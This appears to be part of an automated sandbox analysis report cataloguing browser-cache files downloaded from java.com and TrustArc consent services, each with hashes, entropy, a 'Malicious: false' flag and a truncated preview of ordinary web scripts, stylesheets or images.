Preview:	!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t():"function"==typeof define&&define.amd?define(t):t()}(0,function(){"use strict";function e(e){var t=this.constructor;return this.then(function(n){return t.resolve(e()).then(function(){return n})},function(n){return t.resolve(e()).then(function(){return t.reject(n)})})}function t(e){return new this(function(t,n){function o(e,n){if(n&&("object"==typeof n\|\|"function"==typeof n)){var f=n.then;if("function"==typeof f)return void f.call(n,function(t){o(e,t)},function(n){r[e]={status:"rejected",reason:n},0==--i&&t(r)})}r[e]={status:"fulfilled",value:n},0==--i&&t(r)}if(!e\|\|"undefined"==typeof e.length)return n(new TypeError(typeof e+" "+e+" is not iterable(cannot read property Symbol(Symbol.iterator))"));var r=Array.prototype.slice.call(e);if(0===r.length)return t([]);for(var i=r.length,f=0;r.length>f;f++)o(f,r[f])})}function n(e){return!(!e\|\|"undefined"==typeof e.length)}function o(){}function r(e){if(!(this instanceof r))

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\render[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	5443
Entropy (8bit):	4.986757619365243
Encrypted:	false
SSDEEP:	96:42wPg4jiZqTxEE2jSBOyOLpoVuM9gXlyVTakH:4VPgCiZWR2eBOyepoVuM9SAaW
MD5:	1AB11CB35BFDFB48448EA5594C3BC5AE
SHA1:	A6D9DE08907DEA946248751637E7592AF59DA9CF
SHA-256:	B719089A5754F4FEC74C1A01E8AD645CBC8841C00FF1362FF31EDEC9EE7D4C1A
SHA-512:	7DA26591CC62F8886F8AB76AB134594ED6899553D8C54FC2713FEB9199716026BE1FE9B75B50843505A6B3677A30852A66874ED456EB60E94A1039C1B629A523
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_0933/_compdelivery/JCOM-Header/assets/render.js
Preview:	/* globals define */.define(['knockout', 'jquery', 'text!./template.html', 'i18n!nls/header'], function(ko, $, sampleComponentTemplate, head) {.'use strict';.var ComponentViewModel = function (args) {....// Boilerplate to help us store....var self = this,.....SitesSDK = args.SitesSDK;.....// Store the args. Some times we need these for various functions.....// For example the viewMode will tell you whether you are in edit or edit mode....self.mode = args.viewMode;....self.id = args.id;.....// Define the observables that we are binding....self.showLogo = ko.observable(false);....self.showNav = ko.observable(false);....self.showSearch = ko.observable(false);....self.navLinks = ko.observableArray([]);....self.srchDefault = head.Search;.....// Define any computed functions, which are essentially read only observables.....// This computed function returns the url of the image we were passed......self.resetNav = function() {.....self.renderNav();....};.....self.renderNav = function() {.....s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\render[2].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	exported SGML document, UTF-8 Unicode text
Category:	downloaded
Size (bytes):	9798
Entropy (8bit):	4.822811148672577
Encrypted:	false
SSDEEP:	192:TN4cGGvCMLnJUp5faTF7TkSbGibbc1F0MUJhE24o5sRXqMzXpsvo9LM9dqIC:TNuC+gJTmB8J4mvE5
MD5:	CDA175F1776F94D8025CF4B6578D5EDB
SHA1:	A9E38E986A90632E63007E6F77DB0CD055F64442
SHA-256:	610CEE97B15F5669A733F0802726988EA641C103C10AFAAA7353D2C6C3878840
SHA-512:	A9B691A6D6708C83D5A27783F8C8BD6223056DB2149DC25FAA2137B52FE45C075099D33EDA5A18BB0B6AAF80E515CDD156E3929FF8A6A2BF50D4B9072609255E
Malicious:	false
IE Cache URL:	https://www.java.com/_compdelivery/_cache_0933/JCOM-SimplePage_Detail/assets/render.js
Preview:	/*. Copyright (c) 2019 Oracle and/or its affiliates. All rights reserved.. * Licensed under the Universal Permissive License v 1.0 as shown at http://oss.oracle.com/licenses/upl.. /./ globals define,console */.define([.."jquery",.."mustache",.."marked",.."text!./layout.html".], function ($, Mustache, Marked, templateHtml) {.."use strict";...// Content Layout constructor function...function ContentLayout(params) {...this.contentItemData = params.contentItemData \|\| {};...this.scsData = params.scsData;...this.contentClient = params.contentClient;..}...// Helper function to format a date field by locale...function dateToMDY(date) {...if (!date) {....return "";...}....var dateObj = new Date(date);....var options = {....year: "numeric",....month: "long",....day: "numeric",....hour: "2-digit",....minute: "2-digit"...};...var formattedDate = dateObj.toLocaleDateString("en-US", options);....return formattedDate;..}...// Helper function to parse markdown text...function parseMarkdown(mdText

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\1.cache[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	19413
Entropy (8bit):	5.581542836172917
Encrypted:	false
SSDEEP:	384:+DGRTsMBEHxXyfhNVFBfk6Dz2yFIxBOo7kXrKPHA3du8/sUKt64U0rIlaDM18y6d:zvaH4C6DSy3LqA3o8/K6C
MD5:	9ECBBCC7865B1866C9BE78F3D51B3941
SHA1:	D51473B0D3A0007E56FDE0BFBCB8444A50588CEC
SHA-256:	5F20B1D763177090F7027D3A021E2962AC5D18132E3B33F418CC873E991761DE
SHA-512:	712EE418697AED4ED1D3F8E532705CED944761CDD3E9555123AFF178954AFBD5D229408A7FCEC44454A8922476302E847CA23B2C50F92ABD56FE580794C94CD6
Malicious:	false
IE Cache URL:	https://consent-pref.trustarc.com/defaultpreferencemanager/deferredjs/67B873F492AD87C25B322202223D7A22/1.cache.js
Preview:	function lp(){}.function asb(){}.function dsb(){}.function gsb(){}.function psb(){}.function bub(){ec()}.function fub(a){this.b=a}.function jub(a){this.b=a}.function jsb(a){this.b=a}.function vsb(a){this.b=a}.function Lnb(a){this.b=a}.function Onb(a){this.b=a}.function Snb(a){this.b=a}.function Mtb(a){this.b=a}.function Ptb(a){this.b=a}.function Utb(a){this.b=a}.function Ztb(a){this.b=a}.function msb(a){ec();this.b=a}.function mub(a){ec();this.b=a}.function _ab(a,b){Dl(a.Qd,b)}.function v7(a,b){Nk(a.Qd,b)}.function x7(a,b){Ok(a.Qd,b)}.function Ytb(a,b){a.b.P=b;Wrb(a.b.s,b)}.function vMb(){vMb=R5b;ZPb(NK.e)}.function Dl(b,a){b.selectedIndex=a}.function ftb(a,b){a.o=b;Ri(4,new Ftb(a,b))}.function Zrb(){d8(this,ssb(new tsb(this)))}.function kp(){kp=R5b;jp=new Ep(yec,new lp)}.function htb(a,b){a.d.of(b);x6(a.s,b);x6(icb(pfc),!b)}.function atb(a,b){a.O=b;tPb=b;htb(a,false);Usb(a);Vsb(a)}.function Zab(a,b){Yab(a,b);return a.Qd.options[b].value}.function ktb(a){Rsb();return a!=null&&a.length>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\GoJava[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 125x132, frames 3
Category:	downloaded
Size (bytes):	5138
Entropy (8bit):	7.907565594845598
Encrypted:	false
SSDEEP:	96:T2A9GXRAkg1UYIpLaZwJALfmJSB2vulzEviYHO6tuo8U5GmON0/52twL9:aA9Gtg1UYuLaZWnACgzBaRGmaE52e
MD5:	EB9F0779D76A650F83ACA4488C7B303A
SHA1:	83165410DE505BA628634CC0CCC7CE737248CAA8
SHA-256:	C004C648BEDEF20A52400C2A0CDBC5301ED8FB982D2731798C3620734F145C61
SHA-512:	81ABDF6802666D5AED53F5E5F7780877A276585536FC41A878FCBC5E5ABA96DB29A494DF536A7F6F40CFE97C39550D997C8F5A87245BEC3B74DCF8EBB46D5340
Malicious:	false
IE Cache URL:	https://www.java.com/content/published/api/v1.1/assets/CONT2A739CE297364EFC962C8074B610F485/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
Preview:	......JFIF.....d.d.....C..............................................!........."$".$.......C.........................................................................}..!........................................K..........................!.1...Aaq..."4QRSUt....u....26B...#$b...'3Ccr..................................9.........................!14q......AQRa."...$3..#25B...............?....:...2R...d.3.BaJ.K.AE.Q..$Z.o..........L...K.C4My&...X....i..........b.SP>....^1O.....m..,.g.E..E_..C...b.SP>....^1O.....m.r..xtG.K~..9x.>..\|.=...b.SP>..........~...Tr.}M@.&{h9x.>..\|.=..........-..........L..r.}M@.&{h;..3.?.U.[.=Q..).5...........L..w,.g.D~(....z.3b.E...U.S....7...r..n0:U.:.{qc...K...>Q.U.6...Na.kp...R.g...6..'.O..G.#."-.M......mD.-V.... B ...."......+_....3.zO....OZ~.AzF...=......W....H.......:.Y..'..d...~....V.J.):sN.,.S.$..*%?..&.1_...E0...q.2..+.Z...L^-..nH....0_.,.j..O<..2.U..Nc.F.B.YB.R...t...g..c..C9.#....A.......u..`.L:.E.`.L.Sw......#.fb.I..:.#..O../H.?....P.J

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\JavaOne(2)(2)[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 125x132, frames 3
Category:	downloaded
Size (bytes):	4960
Entropy (8bit):	7.909328562752296
Encrypted:	false
SSDEEP:	96:HQsYCRWH4SNU2NA03ysP2sGzaXFo9ThquCgNeEKC3OenqzTUDD:HQsaH4SR22nP2sGzaX+Thq/gTKI5qID
MD5:	B85FC09ACE4EA90361D6D0953777F962
SHA1:	92313189D76D3F36D3727C81FD22268C14136307
SHA-256:	6A258C518CC6607283FE30819E15F51680BB08ECE976FEC96D3646B29AA964F7
SHA-512:	5B761FF706A496BBFA4D5F2AB3FD8FF8EA8977DA8188D001A61FC0B2EDF66B2BB82A61A2068AED0A0881FBE702A0EF89C6E80F114E8F0DEC04052A58504AAB52
Malicious:	false
IE Cache URL:	https://www.java.com/content/published/api/v1.1/assets/CONTA16A22C5FE954903AC54EDE7D0200709/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
Preview:	......JFIF.............C..............................................!........."$".$.......C.........................................................................}..!........................................N............................!1.A."3QRaq.%2b......#$BDt....5CSr.......Td....................................3........................!13...AQRaq...."2...#b...............?..6...i...K..mr..he.P...?...Iq].....?..~....C..AK5.g..rSp..06.p.j...o...Y.7O.#}..?....O..'.=O..$......Y..$..5w.j7......e~<...P...q.>.s;.s.r?.i..z5r..E....^f..u..f.s..)?;{.}...OH.Uz.61."....?.=.>.q..V....U=z.~.....:}.vcmK..OL..k..&Do.........y...J.........x.MS.+......^.x..U.j.n3{:...!VL....Wq..."....7..#..X......>u..vGoE.Gnw$oO}.....uM+.#.F..Gs..S...M7'....v....{.to...-V5...:O..o...)]'-.(,)Aa_P.';.)......%tL[..v6.T..d..4N.AQ ....Z......Ty&.%...\|w.....G~.:..mGQ4.......@.O..}I5...mq`.. .[. ..<......bp..\|UT......]t..........A^RoU.#.........0.."%^,.$.+....I.....(.~v...Q.._...X.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\cookie_iframe[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	5014
Entropy (8bit):	5.070770931797894
Encrypted:	false
SSDEEP:	96:yGYYYxNFxNmFZiQ/BDZhFIgRxI/wKRpRTWukeWaTESXDAvdD9iPDJi/dDJ3DDJJ2:yGYYgNLNmSQ5FPIgHILWaTESXDAvdD9k
MD5:	1159F3467D523D0578BC6FAFEDD369EC
SHA1:	9F08758879C608D2C718071344B96CEC910499B3
SHA-256:	E5356C4D200584B116D9AC14F89D883B120DBE4D7878914A4FA22358074C74F8
SHA-512:	22DAD07905FBB2399C7E83E81FE7514C0B2AF69C384B99CB93805884AFF55B82A6A090A57CC1C3B5435760FB1659BFCBD3A4A1EAE0DB0EA3FC8FE379551698CE
Malicious:	false
IE Cache URL:	https://prefmgr-cookie.truste-svc.net/cookie_js/cookie_iframe.html?parent=https://consent-pref.trustarc.com/?type=oracle6&site=oracle.com&action=notice&country=ch&locale=en&behavior=expressed&gtm=1&layout=default_eu&irm=undefined&from=https://consent.trustarc.com/
Preview:	<html>.<body>.<script type="text/javascript">.function createCookie(name,value,days) {. if (days) {. var date = new Date();. date.setTime(date.getTime()+(30000));. var expires = "; expires="+date.toGMTString();. }. else var expires = "";. if (shouldSendSameSiteNone(navigator.userAgent)) {. document.cookie = name+"="+value+expires+"; path=/; secure; SameSite=None";. } else {. document.cookie = name+"="+value+expires+"; path=/";. }.}..function readCookie(name) {. var nameEQ = name + "=";. var ca = document.cookie.split(';');. for(var i=0;i < ca.length;i++) {. var c = ca[i];. while (c.charAt(0)==' ') c = c.substring(1,c.length);. if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);. }. return null;.}..function eraseCookie(name) {. createCookie(name,"",-1);.}..function gup( name ).{. name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");. var regexS = "[\\?&]"+name+"=([^&#]*)";.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\defaultpreferencemanager.nocache[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	4867
Entropy (8bit):	5.428888577008623
Encrypted:	false
SSDEEP:	96:MvaPp1xs4ZqPFxUkttqK0wUlhfBPA/eV8rpRrKpKsE5:Mk1bZCXLUK9OhfxADroI
MD5:	DC0A5B2BB779A13971F2890D21B49F18
SHA1:	8F4CA067C1A18EE5A22F7EA82050C4CA238B8169
SHA-256:	038F25DC1D79521CF797F505812CD4AA3B301292DDA0C33B6E6D62C368008FC7
SHA-512:	BE18132D969F4CC9B8653CC0F861CF9016DF2DD99B2429950D92CC0AABBAB3EC5770F65272FD032603A6DFC53F636DBA9E35EF53C844A2B69497788E5B517C57
Malicious:	false
IE Cache URL:	https://consent-pref.trustarc.com/defaultpreferencemanager/defaultpreferencemanager.nocache.js
Preview:	function defaultpreferencemanager(){var O='',wb='" for "gwt:onLoadErrorFn"',ub='" for "gwt:onPropertyErrorFn"',hb='"><\/script>',Y='#',Gb='.cache.html',$='/',kb='//',Eb='67B873F492AD87C25B322202223D7A22',Fb=':',ob='::',Ib='<script defer="defer">defaultpreferencemanager.onInjectionDone(\'defaultpreferencemanager\')<\/script>',gb='<script id="',rb='=',Z='?',tb='Bad handler "',Hb='DOMContentLoaded',ib='SCRIPT',fb='__gwt_marker_defaultpreferencemanager',jb='base',bb='baseUrl',S='begin',R='bootstrap',ab='clear.cache.gif',qb='content',P='defaultpreferencemanager',db='defaultpreferencemanager.nocache.js',nb='defaultpreferencemanager::',X='end',T='gwt.codesvr=',U='gwt.hosted=',V='gwt.hybrid',vb='gwt:onLoadErrorFn',sb='gwt:onPropertyErrorFn',pb='gwt:property',Cb='hosted.html?defaultpreferencemanager',xb='iframe',_='img',yb="javascript:''",Bb='loadExternalRefs',lb='meta',Ab='moduleRequested',W='moduleStartup',mb='name',zb='position:absolute;width:0;height:0;border:none',cb='script',Db='selecting

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\en[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	7866
Entropy (8bit):	5.95880600027834
Encrypted:	false
SSDEEP:	192:mwvXRn9I5C0n1YxSLZ9Y2RUaBuX9tK/CvVlYV2Iaq:mwvXRngC0n1YcLY2RZXoVl0Lv
MD5:	16DC703D78BAA827845314E9C95869CB
SHA1:	1964AE65C375A834CCC24BDD326B669B6B0A542D
SHA-256:	CCE4C23E822F2D5A6E7EFE5B3908A2C6D177C556063229D2E84991779F566E73
SHA-512:	281C9B3748C068D8628E93D3EB78558C89524CE0E6C60581B4C09F64C288EB079144CFCF6AD651A38E1795F58C9CD1087AE806A9EBE52481A34B6AB8AB676750
Malicious:	false
IE Cache URL:	https://www.java.com/en/
Preview:	<!DOCTYPE html>.<html>.<head>.<script type="text/javascript">.var SCSCacheKeys = {..product: '_cache_24c8',..site: '_cache_d099',..theme: '_cache_4ba9',..component: '_cache_0933',..caas: '_cache_97bc'.};.</script>.<meta http-equiv="X-UA-Compatible" content="IE=edge">.<meta name="viewport" content="initial-scale=1">.<script type="text/javascript">.var SCS = { sitesCloudCDN: 'https://static.oracle.com/cdn/cec/v21.2.1.30',.sitePrefix: '/site/JCOM/' };.</script>.<script src="https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/controller.js"></script>.. <script>(window.BOOMR_mq=window.BOOMR_mq\|\|[]).push(["addVar",{"rua.upush":"false","rua.cpush":"false","rua.upre":"true","rua.cpre":"true","rua.uprl":"false","rua.cprl":"false","rua.cprf":"false","rua.trans":"SJ-56b4d09b-ae85-43e9-be51-fc6035934ac1","rua.cook":"true","rua.ims":"false","rua.ufprl":"false","rua.cfprl":"false","rua.isuxp":"","rua.texp":""}]);</script>. <script>!function(e){var n="h

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\get[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	2004
Entropy (8bit):	5.228582846237988
Encrypted:	false
SSDEEP:	48:Qd+wePCCFJw2Gb7IhVkAvm7CJQZfuPEgOpcGbpCBOxm:QdjeqCF0TAvmOJ/Bos
MD5:	EB36752D424D4B17D5C0786DA41ACF66
SHA1:	EBCE41EF9C2581EA61E5C856885008A3E88E55FD
SHA-256:	BD478D1E075F071CA0F0E7F3E27E4C22D27831B23DF86DD6D0F7A37C38263B0E
SHA-512:	E071D33A9B303113E821A3626EBF8CA0E45B0241251862C521A42C68E5ED73C75FD0F18144517569940606736733B7BD2F974791DB10167606C610A838F5A231
Malicious:	false
IE Cache URL:	https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.com
Preview:	<html><head><script>!function(){var e,t,a,r,n,s="truste.consent.",i=function(e){var t,a={},e=a._url=e;if(e=(a._query=e.replace(/^[^;?#][;?#]/,"")).replace(/[#;?&]+/g,"&"))for(e=e.split("&"),t=e.length;0<t--;){var r=e[t].split("="),n=r.shift();a[n]\|\|(a[n]=r.length?decodeURIComponent(r.join("=")):"")}return a}(location.href).domain;function o(e,t){var a=JSON.stringify({source:"preference_manager",message:e,data:t});top.postMessage(a,""),parent.postMessage(a,"*")}function c(e){var t=null;try{var a=self.localStorage;t=a.getItem?a.getItem(e):a[e]}catch(e){}return t&&JSON.parse(t)\|\|null}function p(e){try{var t=s+e,a=c(t);if(!a)return null;if(new Date(a.expires)<new Date)try{return self.localStorage.removeItem(t),null}catch(e){return null}return a}catch(e){}return null}function l(e,t){var a=c(e);!t.popTime&&a&&a.popTime&&(t.popTime=a.popTime);var r="string"==typeof t\|\|t instanceof String?t:JSON.stringify(t);try{var n=self.localStorage;n.setItem?n.setItem(e,r):n[e]=r}catch(e){}}void 0!==i&&o

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\jv0_search_btn[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 19 x 18
Category:	downloaded
Size (bytes):	99
Entropy (8bit):	5.689180797659173
Encrypted:	false
SSDEEP:	3:Clp6Wnta/CSxlOnRFSLUA6wZzzjgPQ2/rnle:Up9oaSjIOLUOjgPxrle
MD5:	6B63F7479D5FDCF11F57F1315339A071
SHA1:	0552EA5365B2C87B850DB6974645F0D81FBD22F8
SHA-256:	AC0AFC4A38CF993FF8048D40E16725EC2C5A59737E68A4DC741A8EDD6A7D3384
SHA-512:	CD875B3E9F87D9BB13784AEFAF9B155603C7A9E32008CEB7DE69DBF78A15D0EC3BE3664ABB1ACF82227D42DFF0BFEF0DBB9FE46E71F1348C164F6D4E5F6A7E8D
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/header/jv0_search_btn.gif
Preview:	GIF89a...................!.......,..........4..h...HX1....=.L...xP.....R&...u+....f.I*...(Af....;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\jv0ht[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 351 x 173
Category:	downloaded
Size (bytes):	5672
Entropy (8bit):	7.931442402707422
Encrypted:	false
SSDEEP:	96:7V+XRRyaia6m3ZU9jfmZBDvseok66dOxoGElY8DXQBDk8V0SBqOT3QZgJn9o:7CRxia6+U9jfmXYefFcxoGUhQ68V0OwX
MD5:	59AA1CA709F752690212C4E0039B0E4F
SHA1:	BEB6644DF8190D7AF1F3DC1DCB4857AB4AEA74C7
SHA-256:	26070A72AE2C336CE985EA6650D78B61304F75265087DDC7144FB407661637B0
SHA-512:	89A2BA004CEFBBC56F19FD4FFBB8BA02DDA9E1063146101DC418436BFA1396FD28D5E7D3884E9A0D762CAFD1831690A5A96D77CF0EF52AD9FA53C4FE82F7C01D
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/home/jv0ht.gif
Preview:	GIF89a_......ddd...........nnn...yyy......................!.......,...._...@....I..8...`(.dirD..g...(..s.....@.xn..n....h.I............Hsp.3..Y.n..k..:.ZA..q9rw.u8n.PR...d....lM.@.T.@.]E-p..4gvxe.....H..hs.}.f$Q.......S'._....Z4...j&....K@...W....z..........!..n.4....@$.<..L..@.%.{..ijD..?....+g...e"...S..)Y.. (.......,.@r......\....!...p...0..0.Y.&.`#B..J...H..8.B.o.l.u...TT.D.X'."D..f=...H.sB.Y.. .....xzu.T.t[.r{.@#.gK.-..B2.d....".3{lp.0.f....O......3....+.....^...X.,...M.(..+...TCf.3J.6.D..L.....j..%<sBW..9....M.......p\.........9.74.n.y...K .ha7.......YID..r.%..1........s".G.f3.XA,.!........!.e..}]T...0..E!...<.c[.&...u..W..,^....Y..y%..".....PF).TVi.Xf.e.3..ep..!....`...\..g0}y.....cxI.c..d..[.i...`H.....A..A....H....\....D.....iY.t..!.=....N...q.ZI..H..W...%.j..\|...i...........x...&......C.4.RP..... .%..W.......*+.y..`.4..$[..............b.K..`.-...;...r.n.}m..bp0R.QA.`z...b.A.h.i....+....zq#...2.....r.0...DE...T.G.."ln#.n".~.+b2.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\oldcss[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	19531
Entropy (8bit):	5.148684251674867
Encrypted:	false
SSDEEP:	192:PdaRCcLuJDRUuOlg/HPYxbMzZq7F2cqNYJvPb/aG5hDupXOgqt+:0HLuJDiuOlg/HPubMzZwSNg/vi
MD5:	431EA90E739570FDA7F169C183BE4FBE
SHA1:	2F7A22A112452C0C02C77545DCB38D65FFB66F80
SHA-256:	90F255EBB8406F78FEC80E412DB772F50AD451F4989352763BAF69728AF37369
SHA-512:	B35797825EA18F47FD64B70B5DB91D48D625C22380179FC841F5F3E84D0A7D3DFA594FB21776CF147B30ABE704C9AD0A70CBD1E790AFA31586AD5ACD0606536D
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/css/oldcss.css
Preview:	TD.bodycell{background-color:#fff}.orangelink{color:#333}a.orangelink{text-decoration:underline}a.orangelink:hover{text-decoration:none}.orangebold{color:#3e6b8a;font-weight:bold}a.orangebold{text-decoration:underline}a.orangebold:hover{text-decoration:none}.subtitle{font-family:Verdana,Arial,Helvetica,Sans-serif;color:#1e475b;font-weight:bold}H3.black{color:#000;font-weight:bold;display:inline}html table.helpHeader{border:1px solid #e4e2e2;border-bottom-width:2px}th.helpHeader{padding-top:3px;padding-bottom:3px;padding-left:10px;color:#000;text-transform:uppercase;vertical-align:middle;line-height:23px}html th.helpHeader{background:#f0efef repeat-y !important}html th.helpHeader a:visited,html th.helpHeader a:link{color:black;font-weight:bold;text-decoration:none}ul.newlist li{color:red;padding-left:0}TD.gradientHeader{padding-top:3px;padding-bottom:3px;padding-left:10px;color:#000;text-transform:uppercase;vertical-align:middle;line-height:23px}a.gradientHeader{color:#000;text-decorati

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\renderer[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines
Category:	downloaded
Size (bytes):	846112
Entropy (8bit):	5.706281748309152
Encrypted:	false
SSDEEP:	24576:inRcPNfZgEmYr1IVohAkk2JdLO+Ma6AkcQ:0RcPNfnr1IVohAkk2JdLO+MaV8
MD5:	A8B04F8E85FE22765349A2D75742CF9E
SHA1:	5BF2BCCF3679399A65FFBDBB9775999934306B1B
SHA-256:	1FE9B2D5C9E775575851158C4338865563B099DD43254FF5E4F1872C78BDCADC
SHA-512:	F257AB31C8AAEC33B2A5774C0902732CA6C8AE8D8B74719A3C3FD71B0BA0712749569CCFDA2F16C36BFD5ADDFC79EF1E27F00AF7B8310A95E9EC14BEDC275C3B
Malicious:	false
IE Cache URL:	https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/renderer.js
Preview:	/** vim: et:ts=4:sw=4:sts=4. * @license RequireJS 2.3.6 Copyright jQuery Foundation and other contributors.. * Released under MIT license, https://github.com/requirejs/requirejs/blob/master/LICENSE. /.var requirejs,require,define;(function(global,setTimeout){var req,s,head,baseElement,dataMain,src,interactiveScript,currentlyAddingScript,mainScript,subPath,version="2.3.6",commentRegExp=/\/\[\s\S]?\\/\|([^:"'=]\|^)\/\/.$/gm,cjsRequireRegExp=/[^.]\srequire\s$\s["']([^'"\s]+)["']\s*$/g,jsSuffixRegExp=/\.js$/,currDirRegExp=/^\.\//,op=Object.prototype,ostring=op.toString,hasOwn=op.hasOwnProperty,isBrowser=!("undefined"==typeof window\|\|"undefined"==typeof navigator\|\|!window.document),isWebWorker=!isBrowser&&"undefined"!=typeof importScripts,readyRegExp=isBrowser&&"PLAYSTATION 3"===navigator.platform?/^complete$/:/^(complete\|loaded)$/,defContextName="_",isOpera="undefined"!=typeof opera&&"[object Opera]"===opera.toString(),contexts={},cfg={},globalDefQueue=[],useInteractive=!1;function

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\setupLibs[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	1672
Entropy (8bit):	5.318338031938511
Encrypted:	false
SSDEEP:	24:xaJ0n6WpZCBqmIuHN2jIw30UfImd0/yqUmeyFC1cwKYmRNymRIoTV/2k/VT7G1Rb:EJ0n6WpZCj0VkU0/yqUHgC1bARJOd
MD5:	D0C9B1531E2D775FCFDD46AE7BE117F1
SHA1:	6A2EF6AE293DAA32312FF20677F03820BE192C84
SHA-256:	0090AF7B11B5B2C49CFD848E2A6A6C2F3223AB36A5C093630804A132412D4883
SHA-512:	F7FBEB4E46405194E4675AF16CC0923BBA8A1AFD4E444FB9BBB5A37104E9F0E210E52BB7A07B2D679AE6D6BA7B4038B9E2686E02E02801CB4DF3C19B9C6B9F22
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/setupLibs.js
Preview:	var setupJET=function(){var e=SCSRenderAPI,t=e.getThemeUrlPrefix(),n={paths:{omniture:t+"/assets/js/s_code_remote",i18n:t+"/assets/js/dependencies/i18n.min",nls:t+"/assets/translations",installed:t+"/assets/js/installed.min",uninstall:t+"/assets/js/uninstallapplet.min"},config:{i18n:{locale:e.getPageLanguageCode()?e.getPageLanguageCode():"en"}}};requirejs.config(n);var a=document.createElement("script");a.async="async",a.type="text/javascript",a.crossOrigin="crossOrigin",a.src="//consent.trustarc.com/notice?domain=oracle.com&c=teconsent&js=bb&noticeType=bb&text=true&gtm=1&language="+(e.getPageLanguageCode()?e.getPageLanguageCode():"en"),$("head").append(a),(-1<window.location.host.indexOf("prodapp")\|\|-1<window.location.host.indexOf("localhost"))&&fixRelativeLinksStatic(),$(".spsidebar li a[href='"+SCSRenderAPI.getPageLinkUrl(SCS.navigationCurr)+"']").css("font-weight","bold")},START_RENDERING_EVENT="scsrenderstart";document.addEventListener?document.addEventListener(START_RENDERING_EVE

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\theme.deferred.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	8914
Entropy (8bit):	5.089447215809406
Encrypted:	false
SSDEEP:	192:FZavoubOycmVUmbDT5bD4DfAxsAl0Qlgso9QIA2DW8WsY/ADDOmIB:FZcSo14zAxsAlYQIA2qvig
MD5:	B6F0D719BC1F8A0DD143AF681743B4AE
SHA1:	E18AD9837E2EDE4185E63CB781FAF2D231C2DFEF
SHA-256:	E189CC46493B57DE1D751B6554AFDA0A641BAEF1F1A43C7DEF19921A0DBA054F
SHA-512:	14B0B05E65F01C5C6EF8AA491DBBABBF889FFB2B49E3A629A3FC37E34296FC8A00E916C337A4288A9C19FF8F987EFD4C36EEB5084AE13F3ECEF965D078F5D86B
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/theme.deferred.min.js
